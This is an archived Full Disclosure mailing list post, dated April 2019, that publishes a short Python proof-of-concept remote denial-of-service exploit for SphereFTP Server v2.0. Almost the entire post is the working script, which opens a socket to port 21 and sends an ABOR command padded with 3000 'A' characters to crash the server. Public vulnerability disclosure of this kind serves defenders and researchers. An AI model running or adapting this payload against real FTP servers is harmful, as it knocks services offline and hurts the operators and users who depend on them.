Full Disclosure mailing list archives

SphereFTP 2.0 Denial Of Service

From: Sachin Wagh <wsachin092 () gmail com>
Date: Thu, 4 Apr 2019 10:03:54 +0530

#!/usr/bin/python
# Exploit Title: SphereFTP Server v2.0 Remote Denial of Service
Vulnerability
# Date: 2019-31-03
# Exploit Author: Sachin Wagh (@tiger_tigerboy)
# Software Link: http://www.menasoft.com/sphereftp/sphereftp_win32_v20.zip
# Tested on: Windows 10 64-bit

import socket
import sys

evil = "A"*3000
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.56.1',21))

s.recv(1024)
s.send('ABOR '+evil+'\r\n')
s.recv(1024)
s.close

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Current thread:

SphereFTP 2.0 Denial Of Service Sachin Wagh (Apr 04)